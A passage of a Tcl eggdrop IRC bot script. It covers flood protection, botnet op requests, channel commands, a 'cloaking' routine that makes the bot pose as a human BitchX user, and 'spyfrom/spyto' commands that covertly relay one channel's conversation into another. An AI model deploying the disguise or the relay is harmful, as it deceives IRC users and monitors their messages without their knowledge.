 set sl_bxawaytmr 1 ; set sl_bxisaway 0 ; timer [expr [rand 300] + 10] sl_bxaway
}
proc sl_ctcp {nick uhost hand dest key arg} {
 set chan [string tolower $dest]
 global botnick sl_ban sl_bflooded sl_bcflood sl_bcqueue sl_ccbanhost sl_ccbannick sl_ccflood sl_ccqueue sl_flooded
 if {[lindex $sl_ccflood 0] != 0 && [validchan $chan] && ![isop $nick $chan]} {
  if {$nick == $botnick} {return 0}
  if {$sl_ban != 0 && ![matchattr $hand f|f $chan]} {
   set bhost *!*[string tolower [string range $uhost [string first @ $uhost] end]]
   lappend sl_ccbannick($chan) $nick ; lappend sl_ccbanhost($chan) $bhost
   utimer [expr [lindex $sl_ccflood 1] + 6] "sl_ccbanqueue [split $chan]"
  }
  if {$sl_flooded($chan)} {return 1} ; incr sl_ccqueue($chan)
  utimer [lindex $sl_ccflood 1] "sl_ccqueuereset [split $chan]"
  if {$sl_ccqueue($chan) >= [lindex $sl_ccflood 0]} {
   dike2_lock $chan "CTCP flood" ; return 1
  }
  if {$sl_bflooded} {return 1}
 } elseif {[lindex $sl_bcflood 0] != 0 && $dest == $botnick} {
  if {$sl_bflooded} {
   sl_ignore $uhost $hand "CTCP flooder" ; return 1
  }
  incr sl_bcqueue ; utimer [lindex $sl_bcflood 1] sl_bcqueuereset
  if {$sl_bcqueue >= [lindex $sl_bcflood 0]} {
   putlog "[sv] \[sl\] CTCP flood detected. Stopped answering CTCPs temporarily."
   set sl_bflooded 1 ; utimer [lindex $sl_bcflood 1] "set sl_bflooded 0"
   ialarm 0 "\[sl\] CTCP flood by $nick"
  return 1
  }
 }
 putloglev 2 * "\[bx\] [b]$nick[b]: CTCP $arg"
 global sl_bxonestack ; if {$sl_bxonestack} {return 1} ; set sl_bxonestack 1
 utimer 2 "set sl_bxonestack 0"
 if {$key == "CLIENTINFO"} {
  set bxcmd [string toupper $arg]
  if {$bxcmd == "NONE"} {
   putserv "NOTICE $nick :\001ERRMSG CLIENTINFO: $bxcmd is not a valid function\001"
   return 0
  } elseif {$bxcmd == ""} {
   set bxcmd "NONE"
  }
  switch $bxcmd {
   NONE { set text "NOTICE $nick :CLIENTINFO SED UTC ACTION DCC CDCC BDCC XDCC VERSION CLIENTINFO USERINFO ERRMSG FINGER TIME PING ECHO INVITE WHOAMI OP OPS UNBAN IDENT XLINK UPTIME  :Use CLIENTINFO <COMMAND> to get more specific information"}
   SED { set text "NOTICE $nick :CLIENTINFO SED contains simple_encrypted_data"}
   UTC  { set text "NOTICE $nick :CLIENTINFO UTC substitutes the local timezone"}
   ACTION { set text "NOTICE $nick :CLIENTINFO ACTION contains action descriptions for atmosphere"}
   DCC { set text "NOTICE $nick :CLIENTINFO DCC requests a direct_client_connection"}
   CDCC { set text "NOTICE $nick :CLIENTINFO CDCC checks cdcc info for you"}
   BDCC { set text "NOTICE $nick :CLIENTINFO BDCC checks cdcc info for you"}
   XDCC { set text "NOTICE $nick :CLIENTINFO XDCC checks cdcc info for you"}
   VERSION { set text "NOTICE $nick :CLIENTINFO VERSION shows client type, version and environment"}
   CLIENTINFO { set text "NOTICE $nick :CLIENTINFO CLIENTINFO gives information about available CTCP commands"}
   USERINFO { set text "NOTICE $nick :CLIENTINFO USERINFO returns user settable information"}
   ERRMSG { set text "NOTICE $nick :CLIENTINFO ERRMSG returns error messages"}
   FINGER { set text "NOTICE $nick :CLIENTINFO FINGER shows real name, login name and idle time of user"}
   TIME { set text "NOTICE $nick :CLIENTINFO TIME tells you the time on the user's host"}
   PING { set text "NOTICE $nick :CLIENTINFO PING returns the arguments it receives"}
   ECHO { set text "NOTICE $nick :CLIENTINFO ECHO returns the arguments it receives"}
   INVITE { set text "NOTICE $nick :CLIENTINFO INVITE invite to channel specified"}
   WHOAMI { set text "NOTICE $nick :CLIENTINFO WHOAMI user list information"}
   OP { set text "NOTICE $nick :CLIENTINFO OP ops the person if on userlist"}
   OPS { set text "NOTICE $nick :CLIENTINFO OPS ops the person if on userlist"}
   UNBAN { set text "NOTICE $nick :CLIENTINFO UNBAN unbans the person from channel"}
   IDENT { set text "NOTICE $nick :CLIENTINFO IDENT change userhost of userlist"}
   XLINK { set text "NOTICE $nick :CLIENTINFO XLINK x-filez rule"}
   UPTIME { set text "NOTICE $nick :CLIENTINFO UPTIME my uptime"}
   default { set text "NOTICE $nick :ERRMSG CLIENTINFO: $arg is not a valid function"}
  }
  putserv $text
  return 1
 }
 if {$key == "VERSION"} {
  global sl_bxversion sl_bxsystem
  putserv "NOTICE $nick :VERSION BitchX-$sl_bxversion by panasync - $sl_bxsystem : Keep it to yourself!"
  return 1
 }
 if {$key == "USERINFO"} { putserv "NOTICE $nick :USERINFO " ; return 1 }
 if {$key == "FINGER"} {
  global realname username sl_bxmachine sl_bxjointime
  set idletime [expr [unixtime] - $sl_bxjointime]
  putserv "NOTICE $nick :FINGER $realname ($username@$sl_bxmachine) Idle $idletime seconds"
  return 1
 }
 if {$key == "ECHO"} {
  if {[validchan $chan]} {return 1}
  putserv "NOTICE $nick :ECHO [string range $arg 0 59]" ; return 1
 }
 if {$key == "ERRMSG"} {
  if {[validchan $chan]} {return 1}
  putserv "NOTICE $nick :ERRMSG [string range $arg 0 59]" ; return 1
 }
 if {$key == "INVITE"} {
  if {[llength $arg] == 0 || [validchan $chan]} {return 1}
  set chan [lindex [split $arg] 0]
  if {[string index $chan 0] == "#" || [string index $chan 0] == "+" || [string index $chan 0] == "&"} {
   if {[validchan $chan]} {
    putserv "NOTICE $nick :BitchX: Access Denied"
    } else {
    putserv "NOTICE $nick :BitchX: I'm not on that channel"
   }
  }
  return 1
 }
 if {$key == "WHOAMI"} {
  if {[validchan $chan]} {return 1}
  putserv "NOTICE $nick :BitchX: Access Denied"
  return 1
 }
 if {$key == "OP" || $key == "OPS"} {
  if {[llength $arg] == 0 || [validchan $chan]} {return 1}
   set chan [lindex [split $arg] 0]
   putserv "NOTICE $nick :BitchX: I'm not on $chan, or I'm not opped"
   return 1
 }
 if {$key == "UNBAN"} {
  if {[llength $arg] == 0 || [validchan $chan]} {return 1}
   set chan [lindex [split $arg] 0]
    if {[validchan $chan]} {
     putserv "NOTICE $nick :BitchX: Access Denied"
    } else {
     putserv "NOTICE $nick :BitchX: I'm not on that channel"
    }
  return 1
 }
 return 0
}
proc sl_bmflood {nick uhost hand text} {
  global sl_bmflood sl_bflooded sl_bmqueue
  if {[lindex $sl_bmflood 0] == 0} {return 0}
  if {[matchattr $hand b] && [string tolower [lindex [split $text] 0]] == "go"} {return 0}
  if {$sl_bflooded} {
    sl_ignore $uhost $hand "MSG flooder"
    return 1
  }
  incr sl_bmqueue
  utimer [lindex $sl_bmflood 1] sl_bmqueuereset
  if {$sl_bmqueue >= [lindex $sl_bmflood 0]} {
    putcmdlog "\[sl\] MSG flood detected, stopped answering MSGs temporarily."
    set sl_bflooded 1
    utimer [lindex $sl_bmflood 1] "set sl_bflooded 0"
    ialarm 0 "\[sl\] MSG flood by $nick"
  }
}
proc sl_nkflood {nick uhost hand chan newnick} {
  global botnick ban-time sl_flooded sl_nkbanhost sl_nkflood sl_nkqueue
  if {[lindex $sl_nkflood 0] == 0} {return 0}
  set chan [string tolower $chan]
  if {[isop $newnick $chan]} {return 0}
  if {$newnick != $botnick && ![matchattr $hand f|f $chan]} {
    set bhost *!*[string tolower [string range $uhost [string first @ $uhost] end]]
    lappend sl_nkbanhost($chan) $bhost
    utimer [expr [lindex $sl_nkflood 1] + 6] "sl_nkbanqueue [split $chan]"
  }
  if {$sl_flooded($chan)} {return 0}
  incr sl_nkqueue($chan)
  utimer [lindex $sl_nkflood 1] "sl_nkqueuereset [split $chan]"
  if {$sl_nkqueue($chan) >= [lindex $sl_nkflood 0]} {
    dike2_lock $chan "NICK flood"
  }
}
proc sl_jflood {nick uhost hand chan} {
  global botnick ban-time sl_flooded sl_jbanhost sljbannick sl_jflood sl_jqueue sl_pqueue
  if {$nick == $botnick} { sl_setarray $nick $uhost $hand $chan ; return 0 }
  set ihost *!*[string tolower [string range $uhost [string first @ $uhost] end]]
  if {[isignore $ihost]} {
    killignore $ihost
  }
  set chan [string tolower $chan]
  if {[lindex $sl_jflood 0] == 0} {return 0}
  if {![matchattr $hand f|f $chan]} {
    set bhost *!*[string tolower [string range $uhost [string first @ $uhost] end]]
    lappend sl_jbannick($chan) $nick
    lappend sl_jbanhost($chan) $bhost
    utimer [expr [lindex $sl_jflood 1] + 6] "sl_jbanqueue [split $chan]"
  }
  if {$sl_flooded($chan)} {return 0}
  incr sl_jqueue($chan)
  utimer [lindex $sl_jflood 1] "sl_jqueuereset [split $chan]"
  if {$sl_jqueue($chan) >= [lindex $sl_jflood 0] && $sl_pqueue($chan) >= [lindex $sl_jflood 0]} {
    dike2_lock $chan "JOIN-PART flood"
  }
}
proc sl_pflood {nick uhost hand chan {msg ""}} {
  global botnick ban-time sl_flooded sl_jflood sl_pbanhost sl_pbannick sl_pqueue
  if {[lindex $sl_jflood 0] == 0} {return 0}
  if {$nick == $botnick} {return 0}
  set chan [string tolower $chan]
  if {${ban-time} != 0 && ![matchattr $hand f|f $chan]} {
    set bhost *!*[string tolower [string range $uhost [string first @ $uhost] end]]
    lappend sl_pbannick($chan) $nick
    lappend sl_pbanhost($chan) $bhost
    utimer [expr [lindex $sl_jflood 1] + 6] "sl_jbanqueue [split $chan]"
  }
  if {$sl_flooded($chan)} {return 0}
  incr sl_pqueue($chan)
  utimer [lindex $sl_jflood 1] "sl_pqueuereset [split $chan]"
}
proc sl_pfloodk {nick uhost hand chan kicked reason} {
  global botnick sl_flooded sl_jflood sl_pqueue
  if {[lindex $sl_jflood 0] == 0} {return 0}
  if {$kicked == $botnick} {return 0}
  set chan [string tolower $chan]
  if {$sl_flooded($chan)} {return 0}
  incr sl_pqueue($chan)
  utimer [lindex $sl_jflood 1] "sl_pqueuereset [split $chan]"
}
proc sl_ccqueuereset {chan} { global sl_ccqueue ; incr sl_ccqueue($chan) -1 }
proc sl_bcqueuereset {} { global sl_bcqueue ; incr sl_bcqueue -1 }
proc sl_bmqueuereset {} { global sl_bmqueue ; incr sl_bmqueue -1 }
proc sl_nkqueuereset {chan} { global sl_nkqueue ; incr sl_nkqueue($chan) -1 }
proc sl_jqueuereset {chan} { global sl_jqueue incr sl_jqueue($chan) -1 }
proc sl_pqueuereset {chan} { global sl_pqueue ; incr sl_pqueue($chan) -1 }
proc sl_ccbanqueue {chan} {
 global sl_ccbanhost sl_ccbannick
 set sl_ccbannick($chan) [lrange sl_ccbannick($chan) 1 end]
 set sl_ccbanhost($chan) [lrange sl_ccbanhost($chan) 1 end]
}
proc sl_nkbanqueue {chan} {
 global sl_nkbanhost
 set sl_nkbanhost($chan) [lrange sl_nkbanhost($chan) 1 end]
}
proc sl_jbanqueue {chan} {
 global sl_jbanhost sl_jbannick
 set sl_jbannick($chan) [lrange sl_jbannick($chan) 1 end]
 set sl_jbanhost($chan) [lrange sl_jbanhost($chan) 1 end]
}
proc sl_pbanqueue {chan} {
 global sl_pbanhost sl_pbannick
 set sl_pbannick($chan) [lrange sl_pbannick($chan) 1 end]
 set sl_pbanhost($chan) [lrange sl_pbanhost($chan) 1 end]
}
proc sl_flud {nick uhost hand type chan} {
 global sl_flooded ; set chan [string tolower $chan]
 if {[validchan $chan] && $sl_flooded($chan)} {return 1}
}
proc sl_dokicks {chan} {
 global botnick sl_ccbannick sl_jbannick sl_pbannick
 if {![onchan $botnick $chan] || ![botisop $chan]} {return 0}
 sl_kick $chan $sl_ccbannick($chan) "CTCP flooder"
 set jklist $sl_jbannick($chan) ; set pklist $sl_pbannick($chan)
 if {$jklist != "" && $pklist != ""} {
  set klist ""
  foreach knick $jklist {
   if {[lsearch -exact $pklist $knick] != -1} { lappend klist $knick }
  }
  sl_kick $chan $klist "JOIN-PART flooder"
 }
}
proc sl_setbans {chan} {
 global botnick sl_ccbanhost sl_nkbanhost sl_jbanhost sl_pbanhost
 if {![onchan $botnick $chan]} {return 0}
 sl_ban $chan $sl_ccbanhost($chan) "CTCP flooder"
 sl_ban $chan $sl_nkbanhost($chan) "NICK flooder"
 set jblist $sl_jbanhost($chan) ; set pblist $sl_pbanhost($chan)
 if {$jblist != "" && $pblist != ""} {
  set blist ""
  foreach bhost $jblist {
   if {[lsearch -exact $pblist $bhost] != -1} { lappend blist $bhost }
  }
  sl_ban $chan $blist "JOIN-PART flooder"
 }
}
proc sl_kick {chan klist reason} {
 global kick-method
 if {$klist != ""} {
  set kicklist ""
  foreach knick $klist {
   if {[lsearch -exact $kicklist $knick] == -1} { lappend kicklist $knick }
  }
  foreach knick $kicklist {
   if {[onchan $knick $chan]} {
    lappend ksend $knick
    if {[llength $ksend] >= $kick-method} {
     set ksend [join $ksend ","] ; putserv "KICK $chan $ksend :${reason}"
     unset ksend
    }
   }
  }
  if {[info exists ksend]} {
   set ksend [join $ksend ","] ; putserv "KICK $chan $ksend :${reason}"
   unset ksend
  }
 }
}
proc sl_ban {chan blist reason} {
 global sl_ban
 if {$blist != ""} {
  set banlist ""
  foreach bhost $blist {
   if {[lsearch -exact $banlist $bhost] == -1} { lappend banlist $bhost }
  }
  foreach bhost $banlist {
   if {[isban $bhost] || [ispermban $bhost]} {continue}
   newban $bhost sentinel $reason $sl_ban
   putcmdlog "\[sl\] banned $bhost ($reason)"
   sl_ignore $bhost * $reason
  }
 }
}
proc sl_ignore {uhost hand flood} {
 global sl_igtime
 if {$hand != "*"} {
  foreach chan [string tolower [channels]] {
   if {[matchattr $hand f|f $chan]} {return 0}
  }
 }
 set ihost *!*[string tolower [string range $uhost [string first @ $uhost] end]]
 if {[isignore $ihost]} {return 1} ; newignore $ihost sentinel $flood $sl_igtime
 putcmdlog "\[sl\] added $ihost to ignore list ($flood)" ; return 1
}
proc sl_mode {nick uhost hand chan mode victim} {
 global sl_ban max-bans sl_flooded
 if {$hand == "*"} { reop $nick $uhost $hand $chan $mode $victim }
 set m0de [lindex [split $mode] 0] ; set chan [string tolower $chan]
 set cmode [lindex [getchanmode $chan] 0]
 if {[string compare $m0de "+b"] && ![string match *i* $cmode]} {
  if {[botisop $chan] && [expr [llength [chanbans $chan]]] >= [expr ${max-bans}]} {
   putquick "MODE $chan +i" ; set sl_bfull($chan) 1
   utimer 5 "set sl_bfull([split $chan]) 0"
   putcmdlog "\[sl\] locked $chan due to full ban list"
   puthelp "NOTICE $chan :[sv] Please clear the channel ban list"
   ialarm 0 "\[sl\] locked $chan due to full ban list" ; return 0
  }
 }
 if {$sl_ban && ![string compare $m0de "+i"] && $sl_flooded($chan)} {
  utimer 3 "sl_dokicks [split $chan]" ; utimer 6 "sl_setbans [split $chan]"
  return 0
 }
 if {$m0de == "-i" || $m0de == "-m"} {
  if {$sl_flooded($chan)} { set sl_flooded($chan) 0 }
 }
}
proc sl_setarray {nick uhost hand chan} {
 global botnick sl_bfull sl_ccbanhost sl_ccbannick sl_ccqueue sl_flooded sl_jbanhost sl_jbannick sl_jqueue sl_nkbanhost sl_nkqueue sl_pbanhost sl_pbannick sl_pqueue
 set chan [string tolower $chan]
 foreach utimer [utimers] {
  if {[string match "sl_*queuereset $chan" [lindex $utimer 1]]} {
   killutimer [lindex $utimer 2]
  } elseif {[string match "sl_*banqueue $chan" [lindex $utimer 1]]} {
   killutimer [lindex $utimer 2]
  }
 }
 set sl_flooded($chan) 0 ; set sl_ccqueue($chan) 0
 set sl_ccbanhost($chan) "" ; set sl_ccbannick($chan) ""
 set sl_nkqueue($chan) 0 ; set sl_nkbanhost($chan) "" ; set sl_pqueue($chan) 0
 set sl_jqueue($chan) 0 ; set sl_jbanhost($chan) "" ; set sl_jbannick($chan) ""
 set sl_pbanhost($chan) "" ; set sl_pbannick($chan) "" ; set sl_bfull($chan) 0 
}
putlog "[sv] \[init\] - 0x06 - cloaking system"
## 0x07. NETOPS. get ops via botnet authentication messages
bind dcc m getops dcc:getops
if {$limbo == 0} {
 bind bot - gop botnet_request
 bind raw - 471 golimit ; bind raw - 473 goinvite
 bind raw - 474 goban ; bind raw - 475 gokey
 bind raw - 404 goops ; bind raw - 482 goops
}
dv needlink "" ; dv gowantin 0
proc wantlink {} { global needlink ; set needlink "" ; foreach scantimer [timers] { if {[lindex $scantimer 1]=="wantlink"} {killtimer "[lindex $scantimer 2]" }} }
proc goset {} { global gowantin gowantops ; foreach scantimer [timers] { if {[lindex $scantimer 1]=="goreset"} {killtimer "[lindex $scantimer 2]" }} ; set gowantin 1 ; timer 1 goreset }
proc goreset {} { global gowantin ; set gowantin 0 }
proc golimit {fr ky ar} {
 global botnick gowantin
 set chan [lindex $ar 1] ; if {$gowantin == 0} { goset } { return 0 } 
 putbot [randbot] "gop limit $chan $botnick 0" ; return 0
}
proc goinvite {fr ky ar} {
 global botnick gowantin
 set chan [lindex $ar 1] ; if {$gowantin == 0} { goset } { return 0 }
 putbot [randbot] "gop invite $chan $botnick 0" ; return 0
}
proc goban {fr ky ar} {
 global botname gowantin
 set chan [lindex $ar 1] ; if {$gowantin == 0} { goset } { return 0 }
 putbot [randbot] "gop unban $chan $botname 0" ; return 0
}
proc gokey {fr ky ar} {
 global botnick gowantin
 set chan [lindex $ar 1] ; if {$gowantin == 0} { goset } { return 0 }
 putbot [randbot] "gop key $chan $botnick 0" ; return 0
}
proc goops {fr ky ar} {
 global botnick botname gowantin
 set chan [lindex $ar 1] ; if {$gowantin == 0} { goset } { return 0 }
 if {![botonchan $chan]} { return 0 } ;
 if {[botisop $chan]} { ;# "You're not a channel operator" but bot is opped
  putcmdlog "[sv] \[getops\] - [b]CHANNEL $chan IS DESYNCHED FROM THE IRC NETWORK[b] (from $fr)"
 }
 putbot [randbot] "gop op $chan $botnick 0 $botname" ; return 0
}
proc gain_entrance {what chan} {
 global botnick botname needlink
 if {[llength [bots]] < 1} {
  if {$needlink != 1} {
   putloglev 2 * "[sv] \[getops\] Need $what on $chan but no bots linked. :("
   set needlink 1 ; timer 15 wantlink
  }
  return 0
 }
 switch -exact $what {
  limit { putbot [randbot] "gop limit $chan $botnick 0" }
  invite { putbot [randbot] "gop invite $chan $botnick 0" }
  unban { putbot [randbot] "gop unban $chan $botname 0" }
  key { putbot [randbot] "gop key $chan $botnick 0" }
  op {
   if {[botisop $chan]} {
    global botname ; putbot [randbot] "gop op $chan $botnick 0 $botname"
   } { utimer [rand 50] opthebot }
  }
 }
}
proc checkforops chan {
 foreach user [chanlist $chan] { if {[isop $user $chan]} { return 1 }  }
 return 0
}
proc botnet_request {bot com args} {
 global botnick subcom limbo ; if {$limbo != 0} { return }
 set args [lindex $args 0] ; set subcom [lindex $args 0]
 set chan [string tolower [lindex $args 1]] ; set nick [lindex $args 2]
 set bcast [lindex $args 3] ; set hostie [lindex $args 4]
 if {![matchattr $bot b]} {
  ialarm 0 "\[getops\] Bot $bot requesting ops is unknown" ; return 0
 }
 if {![validchan $chan]} { return 0 }
 if {![botonchan $chan] && $subcom != "takekey"} {
  if {$bcast != 1} { putallbots "gop $subcom $chan $nick 1 $hostie" }
  return 0
 }
 switch -exact $subcom {
  op {
   if {![botisop $chan]} {
    if {$bcast != 1} { putallbots "gop op $chan $nick 1 $hostie" }
    return 0
   }
   if {![matchattr $nick b] && ![matchattr [qstrip $nick] b]} {
    # strange strange, unknown nick, if this channel is protected, ignore
    putbot $bot resumenick ; if {![openchan $chan]} { return 1 }
   }
   if {![isop $nick $chan]} {   ;# ok, it's a bot, we are supposed to op it
    set realhost $nick!*[getchanhost $nick $chan]
    if {$hostie == ""} {
      putcmdlog "[sv] \[getops\] Bot [b]$bot[b] uses an incompatible getops protocol."
      putbot $bot "secu [b]You've sent an getop request that is incompatible to my protocol.[b]"
     }
    if {[string match $realhost $hostie]} { ;# ok fine, it matches
     pushmode $chan +o $nick ; flushmode $chan ; return 2
    }
    if {[testip [lindex [split $realhost @!] 2]]==1 && [testip [lindex [split $hostie @!] 1]]==0} {
    # ok, the hostname probably wasn't resolved
     if {[openchan $chan]} { pushmode $chan +o $nick ; return 3 } {
      ialarm 1 "\[getops\] hostmask verification problem on closed channel $chan, bot $bot"
      return -3
     }
    }
    # ok, a newsch00l takeover kiddie has too much time on his/her hands
    if {![openchan $chan]} {
     putquick "KICK $chan $nick :I KNOW WHERE YOU LIVE!"
     dike2_lock $chan "takeover attempt" ; return -4
    }
   }
   return 1
  }
  unban {
   if {![botisop $chan]} {
    if {$bcast != 1} { putallbots "gop unban $chan $nick 1" }
    return 0
   }
   set s 0
   foreach ban [chanbans $chan] {
    if {[string compare $nick $ban]} { pushmode $chan -b [lindex $ban 0] ; set s 1 ; break }
    set q 0 ; set botmask [split [string tolower $nick] @!]
    set banmask [split [string tolower $ban] @!*]
    if {[string match $ban $nick]>0} {set q 1}
    if {[string match [lindex $botmask 0] [lindex $banmask 0]]>0} {set q 1}
    if {[string match [lindex $botmask 1] [lindex $banmask 1]]>0} {set q 1}
    if {[string match [lindex $botmask 2] [lindex $banmask 1]]>0} {set q 1}
    if {[string match [lindex $botmask 2] [lindex $banmask 2]]>0} {set q 1}
    if {[string match [lindex $botmask 0]*!*@* $ban]>0} {set q 1}
    if {$q==1} { pushmode $chan -b [lindex $ban 0] ; incr s }
   }
   if {$s == 0} { resetbans $chan }     ;# Our eleet algorithm failed, so... :|
   return 1
  }
  invite {
   if {![botisop $chan]} {
    if {$bcast != 1} { putallbots "gop invite $chan $nick 1" }
    return 0
   }
   if {[matchattr $bot b] && ![onchan $nick $chan]} {
    if {![openchan $chan] && ![matchattr $nick o]} { return 1 }
    putserv "INVITE $nick $chan"
   }
   return 1
  }
  limit {
   if {![botisop $chan]} {
    if {$bcast != 1} { putallbots "gop limit $chan $nick 1" }
    return 0
   }
   if {[islimit $chan] && ![onchan $nick $chan]} { 
    pushmode $chan +l [expr [llength [chanlist $chan]] + 1]
   }
   return 1
  }
  key {
   if {[string match *k* [lindex [getchanmode $chan] 0]] && ![onchan $nick $chan]} {
    putbot $bot "gop takekey $chan [lindex [getchanmode $chan] 1]"
   }
   return 1
  }
  takekey {
   foreach channel [string tolower [channels]] {
    if {[string compare [string tolower $chan] $channel]==0} {
     if {![botonchan $channel]} { putserv "JOIN $channel $nick" }
     return 1
    }
   }
  }
  default {
   ialarm 2 "$bot tried to hack ops ($subcom)"
  }
 }
}
proc lbots {} {
 set unf ""
 foreach users [userlist b] {
  foreach bs [bots] { if {$users == $bs} { lappend unf $users } }
 }
 return $unf
}
proc do_channels {} {
 foreach a [string tolower [channels]] {
  channel set $a need-op "gain_entrance op $a"
  channel set $a need-key "gain_entrance key $a"
  channel set $a need-invite "gain_entrance invite $a"
  channel set $a need-unban "gain_entrance unban $a"
  channel set $a need-limit "gain_entrance limit $a"
 }
 if {![string match *do_channels* [timers]]} { timer 60 do_channels }
}
if {![string match *do_channels* [timers]]} { timer 1 do_channels }
proc dcc:getops {hand idx args} {
 putdcc $idx "[sv] \[getops\] - requested op/inv/key/unban/limit on all channels"
 opthebot ; return 0
}
proc opthebot {} {
 global botnick botname
 if {[llength [lbots]] < 1} {
  global needlink
  if {$needlink != 1} {
   putcmdlog "[sv] \[getops\] No bots linked. :("
   set needlink 1 ; timer 15 wantlink
  }
  foreach scantimer [timers] { if {[lindex $scantimer 1]=="opthebot"} {killtimer "[lindex $scantimer 2]" }}
  timer [expr 3 + [rand 5]] opthebot
  return 0
 }
 global server
 foreach damn_chan [channels] {
  if {![botonchan $damn_chan] && [info exists server] && $server != ""} {
   putbot [randbot] "gop limit $damn_chan $botnick 0"
   putbot [randbot] "gop invite $damn_chan $botnick 0"
   putbot [randbot] "gop unban $damn_chan $botname 0"
   putbot [randbot] "gop key $damn_chan $botnick 0"
  }
  if {![botisop $damn_chan]} {
   global botname
   putbot [randbot] "gop op $damn_chan $botnick 0 $botname"
  }
 }
 foreach scantimer [timers] { if {[lindex $scantimer 1]=="opthebot"} {killtimer "[lindex $scantimer 2]" }}
 timer [expr 3 + [rand 5]] opthebot
}
opthebot ; set getops_loaded 1 ; putlog "[sv] \[init\] - 0x07 - botnet ops"
## 0x08. CHANNEL. add/remove and handle channels
if {$limbo == 0} {
 bind dcc m join dcc:+channel
 bind dcc m part dcc:-channel
 bind dcc m leave dcc:-channel
 bind dcc m cycle dcc:cycle
 bind dcc m chanset dcc:chanset
 bind dcc m mode dcc:chanmode
 bind dcc o channels dcc:channels
 bind dcc n spyfrom dcc:spyfrom
 bind dcc n spyto dcc:spyto
 bind dcc n nospy dcc:nospy
 bind raw - 405 toomany
}
proc dcc:+channel {hand idx vars} {
 global channels ; set channel [lindex $vars 0]
 if {$vars == ""} {
  putdcc $idx "[sv] \[channel\] - please specify a channel to join" ; return 0
 }
 newchannel $channel
 return 1
}
proc dcc:-channel {hand idx arg} {
 if {$arg == ""} {
  putdcc $idx "[sv] \[channel\] - please specify a channel" ; return 0
 }
 set channel [lindex $arg 0] ; channel remove $channel
 putlog "[sv] \[channel\] - removed channel [b]$channel[b]" ; return 1
}
proc dcc:cycle {handle idx arg} {
 global channels numchannels ; set channel [lindex $arg 0]
 if {$arg == ""} {
  putdcc $idx "[sv] \[channel\] - please specify a channel to cycle on"
  return 0
 }
 putserv "JOIN $channel" ; putserv "PART $channel"
 putlog "[sv] \[channel\] - cycling [b]$channel[b]..."
 return 1
}
proc dcc:chanset {hand idx vars} {
 global botnick
 set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 if {$who == ""} {
  putdcc $idx "[sv] \[channel\] - please specify a channel and one of the following modes \[+/-\]"
  putdcc $idx "[sv] \[channel\] - [b]autoop bitch revengebot dynamicbans enforcebans greet[b]"
  putdcc $idx "[sv] \[channel\] - [b]protectops revenge secret shared statuslog stopnethack[b]"
  return 0
 }
 channel set $who $why
 putdcc $idx "[sv] \[channel\] - channel $who is set to $why"
 return 1
}
proc dcc:chanmode {hand idx vars} {
 global botnick
 set who [lindex $vars 0] ; set why [lrange $vars 1 end]
 if {$why == ""} {
  putdcc $idx "[sv] \[channel\] - please specify a channel and the modes"
  putdcc $idx "[sv] \[channel\] - valid modes: \[+/-\] bo / iklmnpst"
  return 0
 }
 channel set $who chanmode $why
 putlog "[sv] \[channel\] - mode [b]$who[b] $why"
 putdcc $idx "[sv] \[channel\] - now enforcing $why on $who"
 return 1
}
proc dcc:channels {hand idx arg} {
 putdcc $idx "[sv] \[channel\] I am currently on: [channels]" ; return 1
}
proc toomany {fr ky ar} {
 set evil [lindex [channels] end] ; channel remove $evil
 putlog "[sv] \[channel\] Too many channels, removed [b]$evil[b]"
 return 0
}
dv rcchans "" ; dv destchan ""
proc dcc:spyto {hand idx arg} {
 global destchan ; set ch [lindex $arg 0]
 if {![string match #* $ch]} {
  putdcc $idx "\[channel\] usage: .spyto #channel"
  putdcc $idx "\[channel\] current destination channel: $destchan" ; return 0
 }
 set destchan $ch ; return 1
}
proc dcc:nospy {hand idx arg} {
 global rcchans ; set ch [lindex $arg 0]
 if {![string match #* $ch]} {
  putdcc $idx "\[channel\] usage: .nospy #channel"
  putdcc $idx "\[channel\] current relay channels: $rcchans" ; return 0
 }
 set rcchans [lreplace $rcchans [lsearch $rcchans $ch] [lsearch $rcchans $ch]]
 catch {
  unbind join - *${ch}* spyjoin ; unbind part - *${ch}* spypart
  unbind pubm - *${ch}* spypub ; unbind nick - *${ch}* spynick
  unbind sign - *${ch}* spysign ; unbind kick - *${ch}* spykick
 }
 putdcc $idx "\[channel\] removed spychannel $ch" ; return 1
}
proc dcc:spyfrom {hand idx arg} {
 global rcchans destchan ; set ch [lindex $arg 0]
 if {![string match #* $ch]} {
  putdcc $idx "\[channel\] usage: .spyfrom #channel"
  putdcc $idx "\[channel\] current relay channels: $rcchans"
  putdcc $idx "\[channel\] current destination channel: $destchan" ; return 0
 }
 if {$destchan == ""} {
  putdcc $idx "\[channel\] please set a destination channel with [b]spyto[b]!"
  return 0
 }
 set rcchans "$ch $rcchans"
 bind join - *${ch}* spyjoin ; bind part - *${ch}* spypart
 bind pubm - *${ch}* spypub ; bind nick - *${ch}* spynick
 bind sign - *${ch}* spysign ; bind kick - *${ch}* spykick
 putdcc $idx "\[channel\] added spychannel $ch" ; return 1
}
proc spyjoin {nick uhost hand ch} {
 global rcchans ; if {![string match *${ch}* $rcchans]} { return 0 }
 global destchan ; puthelp "PRIVMSG $destchan :(${ch}/JOIN) ${nick}!${uhost}"
}
proc spypart {nick uhost hand ch {msg ""}} {
 global rcchans ; if {![string match *${ch}* $rcchans]} { return 0 }
 global destchan ; puthelp "PRIVMSG $destchan :(${ch}/PART) ${nick}"
}
proc spypub {nick uhost hand ch txt} {
 global rcchans ; if {![string match *${ch}* $rcchans]} { return 0 }
 global destchan ; puthelp "PRIVMSG $destchan :(${ch}) <${nick}> $txt"
}
proc spynick {nick uhost hand ch new} {
 global rcchans ; if {![string match *${ch}* $rcchans]} { return 0 }
 global destchan ; puthelp "PRIVMSG $destchan :(${ch}) $nick -> $new"
}
proc spysign {nick uhost hand ch reas} {
 global rcchans ; if {![string match *${ch}* $rcchans]} { return 0 }
 global destchan ; puthelp "PRIVMSG $destchan :(${ch}/QUIT) $nick (${reas})"
}
proc spykick {nick uhost hand ch target reas} {
 global rcchans ; if {![string match *${ch}* $rcchans]} { return 0 }
 global destchan ; puthelp "PRIVMSG $destchan :(${ch}/KICK) $target by $nick (${reas})"
}
putlog "[sv] \[init\] - 0x08 - channel script"
## 0x09. BOTNET. botnet-wide user/channel management
bind dcc n rjoin dcc:rjoin
bind dcc t share dcc:share
bind dcc n mdel dcc:massdel
bind dcc n mchattr dcc:mchattr
bind dcc n mpasswd dcc:mpass
bind bot p botpass bot:mpasswd
bind dcc n mbchattr dcc:mbchattr
bind dcc m mmode dcc:netmode
bind dcc m mchanset dcc:netchanset
